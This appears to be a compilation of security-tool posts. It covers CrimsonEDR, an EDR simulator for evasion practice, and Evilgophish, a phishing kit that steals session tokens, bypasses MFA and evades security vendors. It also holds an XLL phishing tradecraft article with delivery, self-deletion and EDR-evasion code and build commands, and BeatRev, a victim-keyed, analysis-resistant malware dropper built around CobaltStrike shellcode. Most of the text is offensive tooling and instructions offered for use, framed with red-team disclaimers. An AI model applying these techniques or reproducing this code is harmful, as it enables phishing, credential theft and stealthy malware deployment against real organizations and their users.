
CrimsonEDR - Simulate The Behavior Of AV/EDR For Malware Development Training

By: Zion3R


CrimsonEDR is an open-source project engineered to identify specific malware patterns, offering a tool for honing skills in circumventing Endpoint Detection and Response (EDR). By leveraging diverse detection methods, it empowers users to deepen their understanding of security evasion tactics.


Features

Detection: Description
Direct Syscall: Detects the usage of direct system calls, often employed by malware to bypass traditional API hooks.
NTDLL Unhooking: Identifies attempts to unhook functions within the NTDLL library, a common evasion technique.
AMSI Patch: Detects modifications to the Anti-Malware Scan Interface (AMSI) through byte-level analysis.
ETW Patch: Detects byte-level alterations to Event Tracing for Windows (ETW), commonly manipulated by malware to evade detection.
PE Stomping: Identifies instances of PE (Portable Executable) stomping.
Reflective PE Loading: Detects the reflective loading of PE files, a technique employed by malware to avoid static analysis.
Unbacked Thread Origin: Identifies threads originating from unbacked memory regions, often indicative of malicious activity.
Unbacked Thread Start Address: Detects threads with start addresses pointing to unbacked memory, a potential sign of code injection.
API Hooking: Places a hook on the NtWriteVirtualMemory function to monitor memory modifications.
Custom Pattern Search: Allows users to search for specific patterns provided in a JSON file, facilitating the identification of known malware signatures.
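
To make the byte-level checks above more concrete, here is a rough, hypothetical sketch (not CrimsonEDR's actual code) of how an AMSI patch might be detected by comparing the in-memory prologue of AmsiScanBuffer against a known-good copy:

#include <windows.h>
#include <string.h>

/* Hypothetical byte-level AMSI patch check (illustrative only, not taken
   from CrimsonEDR): compare the current prologue of amsi.dll!AmsiScanBuffer
   against a clean copy captured when the DLL was first loaded. */
int AmsiLooksPatched(const unsigned char *cleanPrologue, size_t len)
{
    HMODULE amsi = GetModuleHandleA("amsi.dll");
    if (amsi == NULL) return 0;                      /* AMSI not loaded yet */

    FARPROC fn = GetProcAddress(amsi, "AmsiScanBuffer");
    if (fn == NULL) return 0;

    /* Any difference from the clean prologue suggests tampering, such as
       the common "mov eax, 0x80070057; ret" patch. */
    return memcmp((const void *)fn, cleanPrologue, len) != 0;
}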

Installation

To get started with CrimsonEDR, follow these steps:

  1. Install dependency: sudo apt-get install gcc-mingw-w64-x86-64
  2. Clone the repository: git clone https://github.com/Helixo32/CrimsonEDR
  3. Compile the project: cd CrimsonEDR; chmod +x compile.sh; ./compile.sh

⚠️ Warning

Windows Defender and other antivirus programs may flag the DLL as malicious because it contains the byte patterns used to verify whether AMSI has been patched. Please whitelist the DLL or temporarily disable your antivirus when using CrimsonEDR to avoid interruptions.

Usage

To use CrimsonEDR, follow these steps:

  1. Make sure the ioc.json file is placed in the current directory from which the monitored executable is launched. For example, if you launch the executable you want to monitor from C:\Users\admin\, the DLL will look for ioc.json at C:\Users\admin\ioc.json. Currently, ioc.json contains patterns related to msfvenom. You can easily add your own in the following format:
{
"IOC": [
["0x03", "0x4c", "0x24", "0x08", "0x45", "0x39", "0xd1", "0x75"],
["0xf1", "0x4c", "0x03", "0x4c", "0x24", "0x08", "0x45", "0x39"],
["0x58", "0x44", "0x8b", "0x40", "0x24", "0x49", "0x01", "0xd0"],
["0x66", "0x41", "0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40"],
["0x8b", "0x0c", "0x48", "0x44", "0x8b", "0x40", "0x1c", "0x49"],
["0x01", "0xc1", "0x38", "0xe0", "0x75", "0xf1", "0x4c", "0x03"],
["0x24", "0x49", "0x01", "0xd0", "0x66", "0x41", "0x8b", "0x0c"],
["0xe8", "0xcc", "0x00", "0x00", "0x00", "0x41", "0x51", "0x41"]
]
}
  2. Execute CrimsonEDRPanel.exe with the following arguments:

    • -d <path_to_dll>: Specifies the path to the CrimsonEDR.dll file.

    • -p <process_id>: Specifies the Process ID (PID) of the target process where you want to inject the DLL.

For example:

.\CrimsonEDRPanel.exe -d C:\Temp\CrimsonEDR.dll -p 1234

Useful Links

Here are some useful resources that helped in the development of this project:

Contact

For questions, feedback, or support, please reach out to me via:



Evilgophish - Evilginx2 + Gophish


Combination of evilginx2 and GoPhish.

Credits

Before I begin, I would like to say that I am in no way bashing Kuba Gretzky and his work. I thank him personally for releasing evilginx2 to the public. In fact, without his work this work would not exist. I must also thank Jordan Wright for developing/maintaining the incredible GoPhish toolkit.

Prerequisites

You should have a fundamental understanding of how to use GoPhish, evilginx2, and Apache2.


Disclaimer

I shall not be responsible or liable for any misuse or illegitimate use of this software. This software is only to be used in authorized penetration testing or red team engagements where the operator(s) have been given explicit written permission to carry out social engineering.

Why?

As a penetration tester or red teamer, you may have heard of evilginx2 as a proxy man-in-the-middle framework capable of bypassing two-factor/multi-factor authentication. This is enticing to us to say the least, but when trying to use it for social engineering engagements, there are some issues off the bat. I will highlight the two main problems that have been addressed with this project, although some other bugs have been fixed in this version which I will highlight later.

  1. Lack of tracking - evilginx2 does not provide unique tracking statistics per victim (e.g. opened email, clicked link, etc.); this is problematic for clients who want/need/pay for these statistics when signing up for a social engineering engagement.
  2. Session overwriting with NAT and proxying - evilginx2 bases a lot of logic off of the remote IP address and will whitelist an IP for 10 minutes after the victim triggers a lure path. evilginx2 will then skip creating a new session for that IP address if it triggers the lure path again (while still in the 10 minute window). This presents issues for us if our victims are behind a firewall all sharing the same public IP address, as the same session within evilginx2 will keep getting overwritten with multiple victims' data, leading to missed and lost data. This also presents an issue for our proxy setup, since localhost is the only IP address making requests to evilginx2.

Background

In this setup, GoPhish is used to send emails and provide a dashboard for evilginx2 campaign statistics, but it is not used for any landing pages. Your phishing links sent from GoPhish will point to an evilginx2 lure path and evilginx2 will be used for landing pages. This provides the ability to still bypass 2FA/MFA with evilginx2, without losing those precious stats. Apache2 is simply used as a proxy to the local evilginx2 server and as an additional hardening layer for your phishing infrastructure. Realtime campaign event notifications are provided by a local websocket/http server I have developed, and fully usable JSON strings containing tokens/cookies from evilginx2 are displayed directly in the GoPhish GUI (and feed):

Infrastructure Layout

  • evilginx2 will listen locally on port 8443
  • GoPhish will listen locally on port 8080 and 3333
  • Apache2 will listen on port 443 externally and proxy to local evilginx2 server
    • Requests will be filtered at Apache2 layer based on redirect rules and IP blacklist configuration
      • Redirect functionality for unauthorized requests is still baked into evilginx2 if a request hits the evilginx2 server

setup.sh

setup.sh has been provided to automate the needed configurations for you. Once this script is run and you've fed it the right values, you should be ready to get started. Below is the setup help (note that certificate setup is based on letsencrypt filenames):

Redirect rules have been included to keep unwanted visitors from visiting the phishing server as well as an IP blacklist. The blacklist contains IP addresses/blocks owned by ProofPoint, Microsoft, TrendMicro, etc. Redirect rules will redirect known "bad" remote hostnames as well as User-Agent strings.

replace_rid.sh

If you have already run setup.sh and replaced the default rid value throughout the project, replace_rid.sh was created to replace the rid value again.

Usage:
./replace_rid.sh <previous rid> <new rid>
- previous rid - the previous rid value to be replaced
- new rid - the new rid value to replace it with
Example:
./replace_rid.sh user_id client_id

Email Campaign Setup

Once setup.sh is run, the next steps are:

  1. Start GoPhish and configure email template, email sending profile, and groups
  2. Start evilginx2 and configure phishlet and lure (must specify full path to GoPhish sqlite3 database with -g flag)
  3. Ensure Apache2 server is started
  4. Launch campaign from GoPhish and make the landing URL your lure path for evilginx2 phishlet
  5. PROFIT

SMS Campaign Setup

An entire reworking of GoPhish was performed in order to provide SMS campaign support with Twilio. Your new evilgophish dashboard will look like below:

Once you have run setup.sh, the next steps are:

  1. Configure SMS message template. You will use Text only when creating an SMS message template, and you should not include a tracking link as it will appear in the SMS message. Leave Envelope Sender and Subject blank like below:

  2. Configure SMS Sending Profile. Enter your phone number from Twilio, Account SID, Auth Token, and delay in between messages into the SMS Sending Profiles page:

  3. Import groups. The CSV template values have been kept the same for compatibility, so keep the CSV column names the same and place your target phone numbers into the Email column. Note that Twilio accepts the following phone number formats, so they must be in one of these three:

  4. Start evilginx2 and configure phishlet and lure (must specify full path to GoPhish sqlite3 database with -g flag)
  5. Ensure Apache2 server is started
  6. Launch campaign from GoPhish and make the landing URL your lure path for evilginx2 phishlet
  7. PROFIT

Live Feed Setup

Realtime campaign event notifications are handled by a local websocket/http server and live feed app. To get setup:

  1. Select true for feed bool when running setup.sh

  2. cd into the evilfeed directory and start the app with ./evilfeed

  3. When starting evilginx2, supply the -feed flag to enable the feed. For example:

./evilginx2 -feed -g /opt/evilgophish/gophish/gophish.db

  4. You can begin viewing the live feed at: http://localhost:1337/. The feed dashboard will look like below:

IMPORTANT NOTES

  • The live feed page hooks a websocket for events with JavaScript and you DO NOT need to refresh the page. If you refresh the page, you will LOSE all events up to that point.

Phishlets Surprise

Included in the evilginx2/phishlets folder are three custom phishlets not included in evilginx2.

  1. o3652 - modified/updated version of the original o365 (stolen from Optiv blog)
  2. google - updated from previous examples online (has issues, don't use in live campaigns)
  3. knowbe4 - custom (don't have access to an account for testing auth URL, works for single-factor campaigns, have not fully tested MFA)

A Word About Phishlets

I feel like the world has been lacking some good phishlet examples lately. It would be great if this repository could be a central repository for the latest phishlets. Send me your phishlets at fin3ss3g0d@pm.me for a chance to end up in evilginx2/phishlets. If you provide quality work, I will create a Phishlets Hall of Fame and you will be added to it.

Changes To evilginx2

  1. All IP whitelisting functionality removed; a new proxy session is established for every new visitor that triggers a lure path, regardless of remote IP
  2. Fixed issue with phishlets not extracting credentials from JSON requests
  3. Further "bad" headers have been removed from responses
  4. Added logic to check whether the MIME type failed to be retrieved from responses
  5. All X headers relating to evilginx2 have been removed throughout the code (to remove IOCs)

Changes to GoPhish

  1. All X headers relating to GoPhish have been removed throughout the code (to remove IOCs)
  2. Custom 404 page functionality, place a .html file named 404.html in templates folder (example has been provided)
  3. Default rid string in phishing URLs is chosen by the operator in setup.sh
  4. Transparency endpoint and messages completely removed
  5. Added SMS Campaign Support

Changelog

See the CHANGELOG.md file for changes made since the initial release.

Issues and Support

I am taking the same stance as Kuba Gretzky and will not help with creating phishlets. There are plenty of working phishlet examples for you to use when creating your own; if you open an issue asking for a phishlet, it will be closed. I will also not consider issues with your Apache2, DNS, or certificate setup as legitimate issues, and they will be closed. However, if you encounter a legitimate failure/error with the program, I will take the issue seriously.

Future Goals

  • Additions to IP blacklist and redirect rules
  • Add more phishlets

Contributing

I would like to see this project improve and grow over time. If you have improvement ideas, new redirect rules, new IP addresses/blocks to blacklist, phishlets, or suggestions, please email me at: fin3ss3g0d@pm.me or open a pull request.



XLL_Phishing - XLL Phishing Tradecraft


With Microsoft's recent announcement regarding the blocking of macros in documents originating from the internet (email AND web download), attackers have begun aggressively exploring other options to achieve user-driven access (UDA). There are several considerations to be weighed and balanced when looking for a viable phishing-for-access method:

  1. Complexity - The more steps that are required on the user's part, the less likely we are to be successful.
  2. Specificity - Are most victim machines susceptible to your attack? Is your attack architecture specific? Does certain software need to be installed?
  3. Delivery - Are there network/policy mitigations in place on the target network that limit how you could deliver your maldoc?
  4. Defenses - Is application whitelisting enforced?
  5. Detection - What kind of AV/EDR is the client running?

These are the major questions, however there are certainly more. Things get more complex as you realize that these factors compound each other; for example, if a client has a web proxy that prohibits the download of executables or DLL's, you may need to stick your payload inside a container (ZIP, ISO, etc). Doing so can present further issues down the road when it comes to detection. More robust defenses require more complex combinations of techniques to defeat.

This article will be written with a fictional target organization in mind; this organization has employed several defensive measures including email filtering rules, blacklisting certain file types from being downloaded, application whitelisting on endpoints, and Microsoft Defender for Endpoint as an EDR solution.

Real organizations may employ none of these, some, or even more defenses which can simplify or complicate the techniques outlined in this research. As always, know your target.


What are XLL's?

XLL's are DLL's specifically crafted for Microsoft Excel. To the untrained eye they look a lot like normal Excel documents.


XLL's provide a very attractive option for UDA given that they are executed by Microsoft Excel, software that is very commonly encountered in client networks; as an additional bonus, because they are executed by Excel, our payload will almost assuredly bypass Application Whitelisting rules because a trusted application (Excel) is executing it. XLL's can be written in C, C++, or C#, which provides a great deal more flexibility and power (and sanity) than VBA macros, which further makes them a desirable choice.

The downside of course is that there are very few legitimate uses for XLL's, so it SHOULD be a very easy box to check for organizations to block the download of that file extension through both email and web download. Sadly many organizations are years behind the curve and as such XLL's stand to be a viable method of phishing for some time.

There are a series of different events that can be used to execute code within an XLL, the most notable of which is xlAutoOpen. The full list may be seen here:


Upon double clicking an XLL, the user is greeted by this screen:


This single dialog box is all that stands between the user and code execution; with fairly thin social engineering, code execution is all but assured.
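
For orientation, a minimal xlAutoOpen export (the event mentioned above) might look like the following sketch, assuming a project set up against the Excel XLL SDK; it is illustrative only and not the payload built in this article:

#include <windows.h>

/* Excel calls xlAutoOpen when the add-in is loaded; in this tradecraft it is
   where payload code would run. Excel expects a non-zero return on success. */
__declspec(dllexport) int WINAPI xlAutoOpen(void)
{
    MessageBoxA(NULL, "Code execution from xlAutoOpen", "XLL demo", MB_OK);
    return 1;
}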

Something that must be kept in mind is that XLL's, being executables, are architecture specific. This means that you must know your target; the version of Microsoft Office/Excel that the target organization utilizes will (usually) dictate what architecture you need to build your payload for.

There is a pretty clean break in Office versions that can be used as a rule of thumb:

Office 2016 or earlier: x86

Office 2019 or later: x64

It should be noted that it is possible to install the other architecture for each product, however these are the default architectures installed and in most cases this should be a reliable way to make a decision about which architecture to roll your XLL for. Of course depending on the delivery method and pretexting used as part of the phishing campaign, it is possible to provide both versions and rely on the victim to select the appropriate version for their system.

Resources

The XLL payload that was built during this research was based on this project by edparcell. His repository has good instructions on getting started with XLL's in Visual Studio, and I used his code as a starting point to develop a malicious XLL file.

A notable deviation from his repository is that should you wish to create your own XLL project, you will need to download the latest Excel SDK and then follow the instructions on the previously linked repo using this version as opposed to the 2010 version of the SDK mentioned in the README.

Delivery

Delivery of the payload is a serious consideration in context of UDA. There are two primary methods we will focus on:

  1. Email Attachment
  2. Web Delivery

Email Attachment

Either via attaching a file or including a link to a website where a file may be downloaded, email is a critical part of the UDA process. Over the years many organizations (and email providers) have matured and enforced rules to protect users and organizations from malicious attachments. Mileage will vary, but organizations now have the capability to:

  1. Block executable attachments (EXE, DLL, XLL, MZ headers overall)
  2. Block containers like ISO/IMG which are mountable and may contain executable content
  3. Examine zip files and block those containing executable content
  4. Block zip files that are password protected
  5. More

Fuzzing an organization's email rules can be an important part of an engagement, however care must always be taken so as to not tip one's hand that a Red Team operation is ongoing and that information is actively being gathered.

For the purposes of this article, it will be assumed that the target organization has robust email attachment rules that prevent the delivery of an XLL payload. We will pivot and look at web delivery.

Web Delivery

Email will still be used in this attack vector, however rather than sending an attachment it will be used to send a link to a website. Web proxy rules and network mitigations controlling allowed file download types can differ from those enforced in regards to email attachments. For the purposes of this article, it is assumed that the organization prevents the download of executable files (MZ headers) from the web. This being the case, it is worth exploring packers/containers.

The premise is that we might be able to stick our executable inside another file type and smuggle it past the organization's policies. A major consideration here is native support for the file type; 7Z files for example cannot be opened by Windows without installing third party software, so they are not a great choice. Formats like ZIP, ISO, and IMG are attractive choices because they are supported natively by Windows, and as an added bonus they add very few extra steps for the victim.

The organization unfortunately blocks ISO's and IMG's from being downloaded from the web; additionally, because they employ Data Loss Prevention (DLP), users are unable to mount external storage devices, which ISO's and IMG's are considered to be.

Luckily for us, even though the organization prevents the download of MZ-headered files, it does allow the download of zip files containing executables. These zip files are actively scanned for malware, to include prompting the user for the password for password-protected zip files; however because the executable is zipped it is not blocked by the otherwise blanket deny for MZ files.

Zip files and execution

Zip files were chosen as a container for our XLL payload because:

  1. They are natively compatible with Windows
  2. They are allowed to be downloaded from the internet by the organization
  3. They add very little additional complexity to the attack

Conveniently, double clicking a ZIP file on Windows will open that zip file in File Explorer:


Less conveniently, double clicking the XLL file from the zipped location triggers Windows Defender, even when using the stock project from edparcell that doesn't contain any kind of malicious code.


Looking at the Windows Defender alert we see it is just a generic "Wacatac" alert:


However there is something odd; the file it identified as malicious was in c:\users\user\Appdata\Local\Temp\Temp1_ZippedXLL.zip, not C:\users\user\Downloads\ZippedXLL\ where we double clicked it. Looking at the Excel instance in ProcessExplorer shows that Excel is actually running the XLL from appdata\local\temp, not from the ZIP file that it came in:


This appears to be a wrinkle associated with ZIP files, not XLL's. Opening a TXT file from within a zip using notepad also results in the TXT file being copied to appdata\local\temp and opened from there. While opening a text file from this location is fine, Defender seems to identify any sort of actual code execution in this location as malicious.

If a user were to extract the XLL from the ZIP file and then run it, it would execute without any issue; however there is no way to guarantee that a user does this, and we really can't roll the dice on popping AV/EDR should they not extract it. Besides, double clicking the ZIP and then double clicking the XLL is far simpler, and a victim is far more likely to complete those simple actions than go to the trouble of extracting the ZIP.

This problem caused me to begin considering a different payload type than XLL; I began exploring VSTO's (Visual Studio Tools for Office). I highly encourage you to check out that article.

VSTO's ultimately call a DLL which can either be located locally with the .XLSX that initiates everything, or hosted remotely and downloaded by the .XLSX via http/https. The local option provides no real advantages (and in fact several disadvantages in that there are several more files associated with a VSTO attack), and the remote option unfortunately requires a code signing certificate or for the remote location to be a trusted network. Not having a valid code signing cert, VSTO's do not mitigate any of the issues in this scenario that our XLL payload is running into.

We really seem to be backed into a corner here. Running the XLL itself is fine, however the XLL cannot be delivered by itself to the victim either via email attachment or web download due to organization policy. The XLL needs to be packaged inside a container, however due to DLP formats like ISO, IMG, and VHD are not viable. The victim needs to be able to open the container natively without any third party software, which really leaves ZIP as the option; however as discussed, running the XLL from a zipped folder results in it being copied and ran from appdata\local\temp which flags AV.

I spent many hours brainstorming and testing things, going down the VSTO rabbit hole, and exploring all conceivable options until I finally decided to try something so dumb it just might work.

This time I created a folder, placed the XLL inside it, and then zipped the folder:


Clicking into the folder reveals the XLL file:


Double clicking the XLL shows the Add-In prompt from Excel. Note that the XLL is still copied to appdata\local\temp, however there is an additional layer due to the extra folder that we created:


Clicking enable executes our code without flagging Defender:


Nice! Code execution. Now what?

Tradecraft

The pretexting involved in getting a victim to download and execute the XLL will vary wildly based on the organization and delivery method; themes might include employee salary data, calculators for compensation based on skillset, information on a project, an attendee roster for an event, etc. Whatever the lure, our attack will be a lot more effective if we actually provide the victim with what they have been promised. Without follow through, victims may become suspicious and report the document to their security teams which can quickly give the attacker away and curtail access to the target system.

The XLL by itself will just leave a blank Excel window after our code is done executing; it would be much better for us to provide the Excel Spreadsheet that the victim is looking for.

We can embed our XLSX as a byte array inside the XLL; when the XLL executes, it will drop the XLSX to disk beside the XLL after which it will be opened. We will name the XLSX the same as the XLL, the only difference being the extension.
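
A minimal sketch of that drop-and-open step might look like the following (hypothetical names and array contents; in practice the array holds the full XLSX bytes generated by the helper described later):

#include <windows.h>
#include <shellapi.h>
#include <string.h>

/* Hypothetical embedded decoy spreadsheet; in a real build this array would
   contain the complete XLSX file. */
static unsigned char xlsx_bytes[] = { 0x50, 0x4b, 0x03, 0x04 /* ... */ };

/* Drop the decoy XLSX next to the running XLL (same base name, .xlsx
   extension) and open it so the victim sees the promised spreadsheet. */
static void DropDecoySpreadsheet(HMODULE self)
{
    char path[MAX_PATH + 8] = {0};
    if (GetModuleFileNameA(self, path, MAX_PATH) == 0) return;

    char *ext = strrchr(path, '.');
    if (ext == NULL) return;
    strcpy(ext, ".xlsx");              /* importantdoc.xll -> importantdoc.xlsx */

    HANDLE h = CreateFileA(path, GENERIC_WRITE, 0, NULL,
                           CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (h == INVALID_HANDLE_VALUE) return;

    DWORD written = 0;
    WriteFile(h, xlsx_bytes, (DWORD)sizeof(xlsx_bytes), &written, NULL);
    CloseHandle(h);

    ShellExecuteA(NULL, "open", path, NULL, NULL, SW_SHOWNORMAL);
}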

Given that our XLL is written in C, we can bring in some of the capabilities from a previous writeup I did on Payload Capabilities in C, namely Self-Deletion. Combining these two techniques results in the XLL being deleted from disk and the XLSX of the same name being dropped in its place. To the undiscerning eye, it will appear that the XLSX was there the entire time.

Unfortunately the location where the XLL is deleted and the XLSX dropped is the appdata\local\temp folder, not the original ZIP; to address this we can create a second ZIP containing the XLSX alone and also read it into a byte array within the XLL. On execution, in addition to the aforementioned actions, the XLL could try to locate the original ZIP file in c:\users\victim\Downloads\ and delete it before dropping the second ZIP containing just the XLSX in its place. This could of course fail if the user saved the original ZIP in a different location or under a different name, however in many/most cases it should land in the user's Downloads folder automatically.


This screenshot shows in the lower pane the temp folder created in appdata\local\temp containing the XLL and the dropped XLSX, while the top pane shows the original File Explorer window from which the XLL was opened. Notice in the lower pane that the XLL has size 0. This is because it deleted itself during execution, however until the top pane is closed the XLL file will not completely disappear from the appdata\local\temp location. Even if the victim were to click the XLL again, it is now inert and does not really exist.

Similarly, as soon as the victim backs out of the opened ZIP in File Explorer (either by closing it or navigating to a different folder), should they click spreadsheet.zip again they will now find that the test folder contains importantdoc.xlsx; so the XLL has been removed and replaced by the harmless XLSX in both locations that it existed on disk.

This GIF demonstrates the download and execution of the XLL on an MDE trial VM. Note that for some reason Excel opens two instances here; on my home computer it only opened one, so not quite sure why that differs.


Detection

As always, we will ask "What does MDE see?"

A quick screenshot dump to prove that I did execute this on target and catch a beacon back on TestMachine11:




First off, zero alerts:


What does the timeline/event log capture?


Yikes. Truth be told I have no idea where the keylogging, encrypting, and decrypting credentials alerts are coming from as my code doesn't do any of that. Our actions sure look suspicious when laid out like this, but I will again comment on just how much data is collected by MDE on a single endpoint, let alone hundreds, thousands, or hundreds of thousands that an organization may have hooked into the EDR. So long as we aren't throwing any actual alerts, we are probably ok.

Code Sample

The moment most have probably been waiting for, I am providing a code sample of my developed XLL runner, limited to just those parts discussed here in the Tradecraft section. It will be on the reader to actually get the code into an XLL and implement it in conjunction with the rest of their runner. As always, do no harm, have permission to phish an organization, etc.

Compiling and setup

I have included the source code for a program that will ingest a file and produce hex which can be copied into the byte arrays defined in the snippet. Use this on the XLSX you wish to present to the user, as well as the ZIP file containing the folder which contains that same XLSX, and store them in their respective byte arrays. Compile this code using:

gcc -o ingestfile ingestfile.c
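
For reference, a helper in the spirit of ingestfile.c might look like the sketch below (illustrative; the repository ships the actual version). It prints the input file as a C byte-array initializer that can be pasted into the embedded arrays:

#include <stdio.h>

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <file>\n", argv[0]);
        return 1;
    }
    FILE *f = fopen(argv[1], "rb");
    if (f == NULL) {
        perror("fopen");
        return 1;
    }

    int c, n = 0;
    printf("unsigned char data[] = {\n    ");
    while ((c = fgetc(f)) != EOF) {
        printf("0x%02x, ", c);
        if (++n % 12 == 0) printf("\n    ");   /* wrap lines for readability */
    }
    printf("\n};\n");
    fclose(f);
    return 0;
}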

I had some issues getting my XLL's to compile using MinGW on a Kali machine, so I thought I would post the commands here:

x64

x86_64-w64-mingw32-gcc snippet.c 2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/x64/XLCALL32.LIB -o importantdoc.xll -s -Os -DUNICODE -shared -I 2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/

x86

i686-w64-mingw32-gcc snippet.c 2013_Office_System_Developer_Resources/Excel2013XLLSDK/LIB/XLCALL32.LIB -o HelloWorldXll.xll -s -DUNICODE -Os -shared -I 2013_Office_System_Developer_Resources/Excel2013XLLSDK/INCLUDE/ 

After you compile you will want to make a new folder and copy the XLL into that folder. Then zip it using:

zip -r <myzipname>.zip <foldername>/

Note that in order for the tradecraft outlined in this post to work, you are going to need to match some variables in the code snippet to what you name the XLL and the zip file.

Conclusion

With the dominance of Office macros coming to a close, XLL's present an attractive option for phishing campaigns. With some creativity they can be used in conjunction with other techniques to bypass many layers of defenses implemented by organizations and security teams. Thank you for reading and I hope you learned something useful!



BeatRev - POC For Frustrating/Defeating Malware Analysts


BeatRev Version 2

Disclaimer/Liability

The work that follows is a POC to enable malware to "key" itself to a particular victim in order to frustrate efforts of malware analysts.

I assume no responsibility for malicious use of any ideas or code contained within this project. I provide this research to further educate infosec professionals and provide additional training/food for thought for Malware Analysts, Reverse Engineers, and Blue Teamers at large.


TLDR

The first time the malware runs on a victim it AES encrypts the actual payload (an RDLL) using environmental data from that victim. Each subsequent time the malware is run it gathers that same environmental info, AES decrypts the payload stored as a byte array within the malware, and runs it. If it fails to decrypt or the payload fails to run, the malware deletes itself. Protection against reverse engineers and malware analysts.



Updated 6 JUNE 2022



I didn't feel finished with this project so I went back and did a fairly substantial re-write. The original research and tradecraft may be found Here.

Major changes are as follows:

  1. I have released all source code
  2. I integrated Stephen Fewer's ReflectiveDLL into the project to replace Stage2
  3. I formatted some of the byte arrays in this project into string format and parse them with UuidFromStringA. This Repo was used as a template. This was done to lower entropy of Stage0 and Stage1
  4. Stage0 has had a fair bit of AV evasion built into it. Thanks to Cerbersec's Project Ares for inspiration
  5. The builder application to produce Stage0 has been included

There are quite a few different things that could be taken from the source code of this project for use elsewhere. Hopefully it will be useful for someone.

Problems with Original Release and Mitigations

There were a few shortcomings with the original release of BeatRev that I decided to try and address.

Stage2 was previously a standalone executable that was stored as the alternate data stream (ADS) of Stage1. In order to achieve the AES encryption-by-victim and subsequent decryption and execution, each time Stage1 was run it would read the ADS, decrypt it, write back to the ADS, call CreateProcess, and then re-encrypt Stage2 and write it back to disk in the ADS. This was a lot of I/O operations and the CreateProcess call of course wasn't great.

I happened to come upon Stephen Fewer's research concerning Reflective DLL's and it seemed like a good fit. Stage2 is now an RDLL; our malware/shellcode runner/whatever we want to protect can be ported to RDLL format and stored as a byte array within Stage1 that is then decrypted at runtime and executed by Stage1. This removes all of the I/O operations and the CreateProcess call from Version 1 and is a welcome change.

Stage1 did not have any real kind of AV evasion measures programmed in; this was intentional, as it is extra work and wasn't really the point of this research. During the re-write I took it as an added challenge and added API hashing to remove functions from the Import Address Table of Stage1. This has helped with detection and Stage1 has a 4/66 detection rate on VirusTotal. I was comfortable uploading Stage1 given that it is already keyed to the original box it was run on and the file signature constantly changes because of the AES encryption that happens.

I recently started paying attention to entropy as a means to detect malware; to try and lower the otherwise very high entropy that a giant AES encrypted binary blob gives an executable, I looked into integrating shellcode stored as UUID's. Because the binary is stored in string representation, there is lower overall entropy in the executable. Using this technique, the entropy of Stage0 is now ~6.8 and Stage1 ~4.5 (on a max scale of 8).

Finally, it is a giant chore to integrate and produce a complete Stage0 due to all of the pieces that must be manipulated. To make this easier I made a builder application that will ingest a Stage0.c template file, a Stage1 stub, a Stage2 stub, and a raw shellcode file (this was built around Stage2 being a shellcode runner containing CobaltStrike shellcode) and produce a compiled Stage0 payload for use on target.

Technical Details

The Reflective DLL code from Stephen Fewer contains some Visual Studio compiler-specific instructions; I'm sure it is possible to port the technique over to MingW but I do not have the skills to do so. The main problem here is that the CobaltStrike shellcode (stageless is ~265K) needs to go inside the RDLL and be compiled. To get around this and integrate it nicely with the rest of the process I wrote my Stage2 RDLL to contain a global variable chunk of memory that is the size of the CS shellcode; this ~265K chunk of memory has a small placeholder in it that can be located in the compiled binary. The code in src/Stage2 has this added already.

Once compiled, this Stage2 stub is transferred to Kali, where a binary patch may be performed to stick the real CS shellcode into the place in memory where it belongs. This produces the complete Stage2.

To avoid the I/O and CreateProcess fiasco previously described, the complete Stage2 must also be patched into the compiled Stage1 by Stage0; this is necessary in order to allow Stage2 to be encrypted once on-target, in addition to preventing Stage2 from being stored separately on disk. The same concept previously described for Stage2 is applied by Stage0 on target in order to assemble the final Stage1 payload. It should be noted that the memmem function is used in order to locate the placeholder within each stub; this function is not available on Windows, so a custom implementation was used. Thanks to Foxik384 for his code.
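
A rough sketch of that placeholder-patching idea is shown below; the my_memmem and patch_placeholder names are hypothetical stand-ins, not the project's actual code (which credits Foxik384 for its memmem implementation):

#include <stddef.h>
#include <string.h>

/* Simple memmem substitute for Windows builds: returns a pointer to the
   first occurrence of needle inside haystack, or NULL if not found. */
static void *my_memmem(const void *haystack, size_t hlen,
                       const void *needle, size_t nlen)
{
    const unsigned char *h = (const unsigned char *)haystack;
    if (nlen == 0 || hlen < nlen) return NULL;
    for (size_t i = 0; i <= hlen - nlen; i++) {
        if (memcmp(h + i, needle, nlen) == 0)
            return (void *)(h + i);
    }
    return NULL;
}

/* Locate the reserved placeholder region inside a compiled stub and overwrite
   it with the real payload bytes. The payload must fit within the region
   reserved at compile time. */
static int patch_placeholder(unsigned char *stub, size_t stub_len,
                             size_t reserved_len,
                             const unsigned char *payload, size_t payload_len)
{
    static const unsigned char marker[] = "STAGE2_PLACEHOLDER";
    unsigned char *at = (unsigned char *)my_memmem(stub, stub_len,
                                                   marker, sizeof(marker) - 1);
    if (at == NULL || payload_len > reserved_len) return -1;
    memcpy(at, payload, payload_len);
    return 0;
}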

In order to perform a binary patch, we must allocate the required memory up front; this has a compounding effect, as Stage1 must now be big enough to also contain Stage2. With the added step of converting Stage2 to a UUID string, Stage2 balloons in size as does Stage1 in order to hold it. A stage2 RDLL with a compiled size of ~290K results in a Stage0 payload of ~1.38M, and a Stage1 payload of ~700K.

The builder application only supports creating x64 EXE's. However with a little more work in theory you could make Stage0 a DLL, as well as Stage1, and have the whole lifecycle exist as a DLL hijack instead of a standalone executable.

Instructions

These instructions will get you on your way to using this POC.

  1. Compile Builder using gcc -o builder src/Builder/BeatRevV2Builder.c
  2. Modify sc_length variable in src/Stage2/dll/src/ReflectiveDLL.c to match the length of raw shellcode file used with builder ( I have included fakesc.bin for example)
  3. Compile Stage2 (in visual studio, ReflectiveDLL project uses some VS compiler-specific instructions)
  4. Move compiled stage2stub.dll back to kali, modify src/Stage1/newstage1.c and define stage2size as the size of stage2stub
  5. Compile stage1stub using x86_64-w64-mingw32-gcc newstage1.c -o stage1stub.exe -s -DUNICODE -Os -L /usr/x86_64-w64-mingw32/lib -l:librpcrt4.a
  6. Run builder using syntax: ./builder src/Stage0/newstage0_exe.c x64 stage1stub.exe stage2stub.dll shellcode.bin
  7. Builder will produce dropper.exe. This is a formatted and compiled Stage0 payload for use on target.

BeatRev Original Release

Introduction

About 6 months ago it occurred to me that while I had learned and done a lot with malware concerning AV/EDR evasion, I had spent very little time trying to evade or defeat reverse engineering/malware analysis. This was for a few good reasons:

  1. I don't know anything about malware analysis or reverse engineering
